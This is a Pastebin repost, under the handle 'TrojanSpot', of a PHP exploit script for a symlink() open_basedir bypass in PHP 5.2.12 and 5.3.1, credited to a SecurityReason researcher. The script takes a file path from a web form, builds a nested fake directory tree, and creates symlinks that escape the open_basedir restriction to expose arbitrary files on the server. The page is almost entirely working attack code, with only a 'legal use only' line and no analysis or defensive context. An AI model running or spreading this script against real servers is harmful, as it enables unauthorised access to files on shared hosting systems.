API tools faq
paste
TrojanSpot

Symlink open base'dir bypass | www.pemula.info

TrojanSpot
Sep 21st, 2012
254
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.93 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /*
  3. PHP 5.2.12/5.3.1 symlink() open_basedir bypass
  4. by Maksymilian Arciemowicz http://securityreason.com/
  5. cxib [ a.T] securityreason [ d0t] com
  6.  
  7. CHUJWAMWMUZG
  8. */
  9.  
  10. $fakedir="cx";
  11. $fakedep=16;
  12.  
  13. $num=0; // offset of symlink.$num
  14.  
  15. if(!empty($_GET['file'])) $file=$_GET['file'];
  16. else if(!empty($_POST['file'])) $file=$_POST['file'];
  17. else $file="";
  18.  
  19. echo '<PRE><img src=http://www.exploit-db.com/exploits/"http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit from <a
  20. href="http://securityreason.com/" title="Security Audit PHP">Security Audit Lab - SecurityReason</a> labs.
  21. Author : Maksymilian Arciemowicz
  22. <p>Script for legal use only.
  23. <p>PHP 5.2.12 5.3.1 symlink open_basedir bypass
  24. <p>More: <a href="http://securityreason.com/">SecurityReason</a>
  25. <p><form name="form"
  26. action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF"]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>';
  27.  
  28. if(empty($file))
  29.     exit;
  30.  
  31. if(!is_writable("."))
  32.     die("not writable directory");
  33.  
  34. $level=0;
  35.  
  36. for($as=0;$as<$fakedep;$as++){
  37.     if(!file_exists($fakedir))
  38.         mkdir($fakedir);
  39.     chdir($fakedir);
  40. }
  41.  
  42. while(1<$as--) chdir("..");
  43.  
  44. $hardstyle = explode("/", $file);
  45.  
  46. for($a=0;$a<count($hardstyle);$a++){
  47.     if(!empty($hardstyle[$a])){
  48.         if(!file_exists($hardstyle[$a]))
  49.             mkdir($hardstyle[$a]);
  50.         chdir($hardstyle[$a]);
  51.         $as++;
  52.     }
  53. }
  54. $as++;
  55. while($as--)
  56.     chdir("..");
  57.  
  58. @rmdir("fakesymlink");
  59. @unlink("fakesymlink");
  60.  
  61. @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
  62.  
  63. // this loop will skip allready created symlinks.
  64. while(1)
  65.     if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
  66.     else $num++;
  67.  
  68. @unlink("fakesymlink");
  69. mkdir("fakesymlink");
  70.  
  71. die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');
  72.  
  73. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!